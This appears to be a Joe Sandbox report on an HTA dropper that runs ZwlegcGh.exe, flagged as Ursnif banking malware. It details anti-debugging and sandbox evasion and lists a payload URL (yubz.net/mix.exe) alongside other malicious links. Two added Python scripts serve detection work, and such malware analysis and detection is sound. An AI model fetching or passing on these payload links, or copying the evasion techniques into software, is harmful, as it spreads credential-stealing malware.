Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_00441030 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer
PE file contains an invalid checksum
Source: ZwlegcGh.exe.3.dr | Static PE information: real checksum: 0xc0e0f should be: 0xc0074
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\mshta.exe | Code function: 3_2_052CF286 pushad ; iretd 3_2_052CF2F9
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_0045B01C pushad ; retf 4_2_0045B01F
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_00439588 pushad ; retf 4_2_00439589
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_0045B645 pushad ; retf 4_2_0045B646
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_00438861 pushad ; retf 4_2_00438862
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_004A7B50 push dword ptr [ebp+443C5628h]; iretd 4_2_004A7B58
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_004A67A6 push eax; ret 4_2_004A67A9
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_0053A95B push ecx; ret 4_2_0053A96B
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_0053A5A0 push ecx; ret 4_2_0053A5A9

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\SysWOW64\mshta.exe | File created: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.1304396728.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304302273.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304478289.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1303998727.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1303649085.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304166714.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304588205.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304552900.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ZwlegcGh.exe PID: 924, type: MEMORY
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_00420D20 IsWindow,IsIconic, 4_2_00420D20
Disables application error messages (SetErrorMode)
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep | graph_4-36706
Found evasive API chain checking for process token information
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_4-36147
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\mshta.exe TID: 3648 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe TID: 4596 | Thread sleep count: 57 > 30
Source: C:\Windows\SysWOW64\mshta.exe TID: 3756 | Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Last function: Thread delayed
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_00535632 memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 4_2_00535632
Contains functionality to query system information
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_00454670 LdrInitializeThunk,GetCurrentThread,OpenThreadToken,RevertToSelf,CloseHandle,CreateFileMappingA,GetLastError,MapViewOfFile,GetSystemInfo,_memcmp,UnmapViewOfFile,VirtualAlloc, 4_2_00454670
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: mshta.exe, 00000003.00000002.1103471031.00000000065D0000.00000002.00000001.sdmp, mshta.exe, 00000005.00000002.1149456914.0000000006A60000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: mshta.exe, 00000003.00000002.1104356125.0000000006C07000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.1142469680.0000000007090000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000003.00000002.1104136824.0000000006BD4000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWL
Source: mshta.exe, 00000003.00000002.1103471031.00000000065D0000.00000002.00000001.sdmp, mshta.exe, 00000005.00000002.1149456914.0000000006A60000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: mshta.exe, 00000003.00000002.1103471031.00000000065D0000.00000002.00000001.sdmp, mshta.exe, 00000005.00000002.1149456914.0000000006A60000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: mshta.exe, 00000003.00000002.1103471031.00000000065D0000.00000002.00000001.sdmp, mshta.exe, 00000005.00000002.1149456914.0000000006A60000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Program exit points
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | API call chain: ExitProcess graph end node | graph_4-35854
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | API call chain: ExitProcess graph end node | graph_4-36679

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_004016D4 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 4_2_004016D4
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_004507F0 IsDebuggerPresent,DebuggerProbe, 4_2_004507F0
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_00435AC2 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_error,__invoke_watson_if_error,__invoke_watson_if_error,__snwprintf_s,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,__cftoe,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__cftoe,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW, 4_2_00435AC2
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_00441030 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer, 4_2_00441030
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_001F04F7 mov eax, dword ptr fs:[00000030h] 4_2_001F04F7
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_001F04F7 mov eax, dword ptr fs:[00000030h] 4_2_001F04F7
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_001F00C7 push dword ptr fs:[00000030h] 4_2_001F00C7
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_004A6045 mov eax, dword ptr fs:[00000030h] 4_2_004A6045
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_004A6045 mov eax, dword ptr fs:[00000030h] 4_2_004A6045
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_004A5C15 push dword ptr fs:[00000030h] 4_2_004A5C15
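Two of the findings above, the push/ret and pushad/retf stubs under "Uses code obfuscation techniques" and the fs:[30h] reads under "Contains functionality to read the PEB", are plain byte patterns in 32-bit code, so they can be re-checked on the unpacked image without a sandbox. The script below is an added example, not Joe Sandbox tooling: it scans a code buffer for the exact encodings of the instructions listed in this report and, after a PEB read, looks a few bytes ahead for the displacement of the fields anti-debug code reads (BeingDebugged at +2, Ldr at +0Ch, NtGlobalFlag at +68h). The buffer it ships with is constructed, not bytes from ZwlegcGh.exe. Read the hits as triage leads, not verdicts: push reg; ret is also a legitimate indirect-jump idiom, and 60 CB (pushad; retf) is more often two adjacent data bytes than real code, which is a caveat to the sandbox's signature as well.

```python
"""Static triage of a 32-bit code dump for the two patterns this report flags:
fs:[30h] PEB reads and push/ret or pushad/retf stubs. Added example with a
constructed byte buffer; nothing here comes from the sample."""
import re
from typing import List, Optional, Tuple

# 32-bit encodings of the instructions the report lists.
PATTERNS = {
    # mov eax, dword ptr fs:[30h]   (A1 moffs32 form)
    "peb_read_mov_eax_fs30": re.compile(rb"\x64\xa1\x30\x00\x00\x00"),
    # mov r32, dword ptr fs:[30h]   (8B /r with mod=00 rm=101, any destination)
    "peb_read_mov_r32_fs30": re.compile(rb"\x64\x8b[\x05\x0d\x15\x1d\x25\x2d\x35\x3d]\x30\x00\x00\x00"),
    # push dword ptr fs:[30h]
    "peb_push_fs30": re.compile(rb"\x64\xff\x35\x30\x00\x00\x00"),
    # push r32 ; ret  (eax..edi) -> transfer control to the pushed value
    "push_reg_ret": re.compile(rb"[\x50-\x57]\xc3"),
    # pushad ; retf -> in practice almost always data misread as code
    "pushad_retf": re.compile(rb"\x60\xcb"),
}

# After the PEB pointer lands in a register, the next access is normally
# [reg+disp8]: ModRM with mod=01 (0x40..0x7F) followed by the displacement.
# disp8 2 / 0x0C / 0x68 select BeingDebugged / Ldr / NtGlobalFlag.
PEB_FIELD_AFTER = re.compile(rb"[\x40-\x7f](\x02|\x0c|\x68)")
PEB_FIELD_NAMES = {2: "BeingDebugged", 0x0C: "Ldr", 0x68: "NtGlobalFlag"}


def scan(code: bytes, window: int = 16) -> List[Tuple[int, str, Optional[str]]]:
    """Return (offset, pattern, peb_field_or_None) for every hit, ordered by
    offset. The field lookup only inspects `window` bytes after a PEB read and
    is a heuristic, not a disassembler."""
    hits = []
    for name, rx in PATTERNS.items():
        for m in rx.finditer(code):
            field = None
            if name.startswith("peb_"):
                follow = PEB_FIELD_AFTER.search(code, m.end(), m.end() + window)
                if follow:
                    field = PEB_FIELD_NAMES[follow.group(1)[0]]
            hits.append((m.start(), name, field))
    return sorted(hits)


def summarize(code: bytes) -> dict:
    """Hit count per pattern: compare against a known-clean build of the same
    toolchain before reading anything into push_reg_ret or pushad_retf."""
    counts = {name: 0 for name in PATTERNS}
    for _, name, _ in scan(code):
        counts[name] += 1
    return counts


# Constructed test buffer (not bytes from ZwlegcGh.exe): a function reading
# PEB.BeingDebugged, then a push/ret stub, then two junk bytes.
SAMPLE_CODE = bytes.fromhex(
    "55 8B EC"            # push ebp ; mov ebp, esp
    "64 A1 30 00 00 00"   # mov eax, fs:[30h]            -> PEB
    "0F B6 40 02"         # movzx eax, byte ptr [eax+2]  -> PEB.BeingDebugged
    "5D C3"               # pop ebp ; ret
    "51 C3"               # push ecx ; ret               -> jump via the stack
    "60 CB"               # pushad ; retf                -> data, not code
)

if __name__ == "__main__":
    for off, name, field in scan(SAMPLE_CODE):
        print(f"+0x{off:04x}  {name:<24} {field or ''}")
```

On a real unpacked image, run scan() over the executable sections only (the .text of 4.2.ZwlegcGh.exe.400000.1.unpack, for instance) rather than the whole file; string and resource data will otherwise produce push_reg_ret and pushad_retf hits at about the rate chance predicts for two-byte patterns.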
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_0044FAD0 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__write_nolock,___doserrno,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,__get_osfhandle,SetEndOfFile,GetLastError,___doserrno,__lseeki64_nolock, 4_2_0044FAD0
Contains functionality to register its own exception handler
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_00401B9B InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError, 4_2_00401B9B
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_00439740 SetUnhandledExceptionFilter, 4_2_00439740
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_004405D0 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_004405D0
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_0042CCE0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_0042CCE0
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_00436E50 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00436E50

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe
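Taken together with "Drops PE files" in the Persistence section (mshta.exe writes ZwlegcGh.exe into the user's Temp directory), this row is the chain an endpoint rule should catch: a script host writes an executable and then starts it, and the Sigma section of this report shows no rule matched on this run. The code below is an added example, not Joe Sandbox output and not a Sigma rule: detection logic evaluated over constructed Sysmon-style process-creation (Event ID 1) and file-creation (Event ID 11) records that mirror this report's process tree. The ProcessGuid values, the explorer.exe parent and the command line that launches the .hta are assumptions; the image paths are the ones the report lists.

```python
"""Endpoint detection for the script-host drop-and-run chain seen in this
report, evaluated over constructed Sysmon-style events. Added example, not
Joe Sandbox or Sigma code; GUIDs and the .hta command line are assumed values."""
from typing import Dict, List, Tuple

Event = Dict[str, object]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
LOLBINS = {"powershell.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe",
           "certutil.exe", "bitsadmin.exe"}
PE_EXTENSIONS = (".exe", ".dll", ".scr", ".cpl")
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                 "\\users\\public\\", "\\programdata\\", "\\windows\\temp\\")


def _norm(path: object) -> str:
    return str(path or "").replace("/", "\\").lower()


def _basename(path: object) -> str:
    return _norm(path).rsplit("\\", 1)[-1]


def check_event(ev: Event) -> List[str]:
    """Single-event rules. Returns the names of the rules that fire."""
    hits = []
    if ev.get("EventID") == 11 and _basename(ev.get("Image")) in SCRIPT_HOSTS:
        if _norm(ev.get("TargetFilename")).endswith(PE_EXTENSIONS):
            hits.append("script_host_writes_pe")
    if ev.get("EventID") == 1 and _basename(ev.get("ParentImage")) in SCRIPT_HOSTS:
        if any(marker in _norm(ev.get("Image")) for marker in USER_WRITABLE):
            hits.append("script_host_spawns_from_user_writable")
        if _basename(ev.get("Image")) in LOLBINS:
            hits.append("script_host_spawns_lolbin")
    return hits


def run_rules(events: List[Event]) -> List[Tuple[int, str]]:
    return [(i, rule) for i, ev in enumerate(events) for rule in check_event(ev)]


def drop_and_run_chains(events: List[Event]) -> List[Tuple[str, str]]:
    """Correlation rule: a process writes a file (ID 11) and later starts that
    same path as its child (ID 1 whose ParentProcessGuid is the writer's
    ProcessGuid). Higher confidence than either event alone; this is the
    mshta.exe -> ZwlegcGh.exe sequence in the report."""
    written: Dict[Tuple[object, str], Event] = {}
    chains = []
    for ev in events:  # events are assumed to be in time order
        if ev.get("EventID") == 11:
            written[(ev.get("ProcessGuid"), _norm(ev.get("TargetFilename")))] = ev
        elif ev.get("EventID") == 1:
            key = (ev.get("ParentProcessGuid"), _norm(ev.get("Image")))
            if key in written:
                chains.append((str(written[key]["Image"]), str(ev["Image"])))
    return chains


# Constructed events mirroring the report's process tree (GUIDs, the explorer
# parent and the .hta command line are assumptions, not sandbox data).
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 1, "ProcessGuid": "{G-1}", "ParentProcessGuid": "{G-0}",
     "Image": r"C:\Windows\SysWOW64\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Desktop\dokument11900326.hta"'},
    {"EventID": 11, "ProcessGuid": "{G-1}", "Image": r"C:\Windows\SysWOW64\mshta.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe"},
    {"EventID": 1, "ProcessGuid": "{G-2}", "ParentProcessGuid": "{G-1}",
     "Image": r"C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe",
     "ParentImage": r"C:\Windows\SysWOW64\mshta.exe",
     "CommandLine": r"C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe"},
    # benign noise: explorer starting notepad, mshta writing a scratch .tmp file
    {"EventID": 1, "ProcessGuid": "{G-3}", "ParentProcessGuid": "{G-0}",
     "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
    {"EventID": 11, "ProcessGuid": "{G-1}", "Image": r"C:\Windows\SysWOW64\mshta.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\tmp1A2B.tmp"},
]

if __name__ == "__main__":
    for idx, rule in run_rules(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
    for writer, child in drop_and_run_chains(SAMPLE_EVENTS):
        print(f"drop-and-run: {writer} -> {child}")
```

The single-event rules are what a Sigma rule would express; the correlation in drop_and_run_chains is what makes the alert actionable, because mshta.exe writing to Temp and mshta.exe starting a child each occur on their own in benign HTA applications, while the same process doing both with the same path is the loader behaviour this report records.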
May try to detect the Windows Explorer process (often used for injection)
Source: ZwlegcGh.exe, 00000004.00000002.1554026501.0000000000E40000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: ZwlegcGh.exe, 00000004.00000002.1554026501.0000000000E40000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: ZwlegcGh.exe, 00000004.00000002.1554026501.0000000000E40000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: ZwlegcGh.exe, 00000004.00000002.1554026501.0000000000E40000.00000002.00000001.sdmp | Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locale information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: LdrInitializeThunk,GetLocaleInfoA, 4_2_00450540
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_00531341 cpuid 4_2_00531341
Contains functionality to query local / system time
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_004016D4 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 4_2_004016D4
Contains functionality to query the account / user name
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_00531341 GetUserNameW,GetUserNameW,HeapFree,HeapFree, 4_2_00531341
Contains functionality to query windows version
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_004018A2 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 4_2_004018A2

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.1304396728.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304302273.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304478289.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1303998727.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1303649085.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304166714.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304588205.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304552900.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ZwlegcGh.exe PID: 924, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.1304396728.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304302273.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304478289.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1303998727.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1303649085.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304166714.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304588205.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304552900.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ZwlegcGh.exe PID: 924, type: MEMORY

Malware Configuration

No configs have been found

Behavior Graph

Behavior Graph ID: 218146 | Sample: dokument11900326.hta | Start date: 26/03/2020 | Architecture: WINDOWS | Score: 76

Process tree and edges recovered from the rendered graph (icon legend and node counters omitted):

  • Sample-level signature: Yara detected Ursnif
  • mshta.exe, started by the sample
      - network: yubz.net (203.124.113.131, ports 49935, 49936, 80; ASN unknown; Singapore)
      - dropped: C:\Users\user\AppData\Local\...\ZwlegcGh.exe (PE32)
      - started: ZwlegcGh.exe, flagged with: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Writes or reads registry keys via WMI; 2 other signatures
  • iexplore.exe, three instances started by the sample
      - one instance started a second mshta.exe, which also contacted yubz.net, and a child iexplore.exe
      - the other two instances each started a child iexplore.exe

Simulations

Behavior and APIs

Time | Type | Description
09:46:33 | API Interceptor | 2x Sleep call for process: mshta.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
dokument11900326.hta | 3% | Virustotal |

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
4.2.ZwlegcGh.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

Source | Detection | Scanner | Label
yubz.net | 3% | Virustotal |

URLs

Source | Detection | Scanner | Label
https://abby.com | 1% | Virustotal |
https://abby.com | 0% | Avira URL Cloud | safe
http://yubz.net/mix.exe?/ | 0% | Avira URL Cloud | safe
http://yubz.net/mix.exe7 | 0% | Avira URL Cloud | safe
https://abby.com/ | 1% | Virustotal |
https://abby.com/ | 0% | Avira URL Cloud | safe
http://yubz.net/mix.exe | 1% | Virustotal |
http://yubz.net/mix.exe | 0% | Avira URL Cloud | safe
http://yubz.net/mix.exe2 | 0% | Avira URL Cloud | safe
http://www.wikipedia.com/ | 0% | Virustotal |
http://www.wikipedia.com/ | 0% | URL Reputation | safe
http://yubz.net/ | 3% | Virustotal |
http://yubz.net/ | 0% | Avira URL Cloud | safe
https://abby.comd | 0% | Avira URL Cloud | safe
http://yubz.net/mix.exe0:? | 0% | Avira URL Cloud | safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source | Rule | Description | Author
00000004.00000003.1304396728.00000000031F8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000004.00000003.1304302273.00000000031F8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000004.00000003.1304478289.00000000031F8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000004.00000003.1303998727.00000000031F8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000004.00000003.1303649085.00000000031F8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000004.00000003.1304166714.00000000031F8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000004.00000003.1304588205.00000000031F8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000004.00000003.1304552900.00000000031F8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
Process Memory Space: ZwlegcGh.exe PID: 924 | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security

Unpacked PEs

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
203.124.113.131 | dokument9034432.hta | malicious | yubz.net/mix.exe

Domains

Match | Associated Sample Name / URL | Detection | Context
yubz.net | dokument9034432.hta | malicious | 203.124.113.131

ASN

Match | Associated Sample Name / URL | Detection | Context
unknown | SpLW6lfIV3 | malicious | 172.217.168.14
unknown | http://www.tucows.com/thankyou.html?swid=1597673 | malicious | 64.99.128.15
unknown | Scanned-file452071.pdf.lnk | malicious | 216.58.215.225
unknown | 86soq_01[1].exe | malicious | 45.79.188.67
unknown | Document needed.doc | malicious | 185.42.104.172
unknown | look_attach_s0r.js | malicious | 5.101.51.91
unknown | https://www.transfernow.net/rfcDkn032020/742afc | malicious | 104.16.251.5
unknown | https://www.transfernow.net/rfcDkn032020/742afc | malicious | 162.216.250.35
unknown | 📞 Portvanusa.com Voice-message_4.htm | malicious | 13.224.96.127
unknown | 0.884289.js | malicious | 89.107.186.3
unknown | Mark Shared Message.html | malicious | 148.72.248.46
unknown | dokument9034432.hta | malicious | 203.124.113.131
unknown | http://www.hs24st.culbco.com/aHR0cHM6Ly9ib3VjaGVmZXp0ZXIuY29tL3ZvaWNlZT9zMjRwJmVtYWlsPW1ob2hpbWVyQGZhbWlseS1pbnN0aXR1dGUub3JnJm4yNHQ= | malicious | 47.91.107.110
unknown | zaMTU7CMVg.exe | malicious | 104.18.88.101
unknown | https://polykaura.com/staple/8095423/8095423.zip | malicious | 127.0.0.1
unknown | job_presentation_w5i.js | malicious | 5.101.51.91
unknown | pw11-pro-demo.exe | malicious | 151.101.12.134
unknown | https://u15378345.ct.sendgrid.net/ls/click?upn=LnRBZ0nlWE6aikWcMGzbxSndG29F1nfrc3pRL4WE6n5D96fp4WIRaLWjD2mYFsWx-2FvC3z4u6LcWfb5gedruMlC9n7T6yCeg-2BF4wruqUdOwMewU-2FnkROAGyPf-2B-2FvnpD2Zfszo_Plxpf-2FwIng3KxtCnd5dGO72CsxCEs4aYImay408PZTz7bWiDnyl3pbjPf3GfZTjBGZCyn1MtGvxgcVELOYwV9GDDDEcMAaUJGvrgvH32fWwrHFOhatvN4UQeOsjonQztmgto4c6Un1sK9DDuj8NndB1gk7yRf2BtSW-2Bvo82sqow9y4N3arjbuysXVhUySz7QdoxBdwd81xncE9Qgd-2FKFIhQoqECyewc7Gm-2B9r-2BBfM46nIYRYKydtdqjeP8jmXWtr | malicious | 167.89.118.35
unknown | TableOfColors.exe | malicious | 127.0.0.1
unknown | TableOfColors.exe | malicious | 127.0.0.1

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots
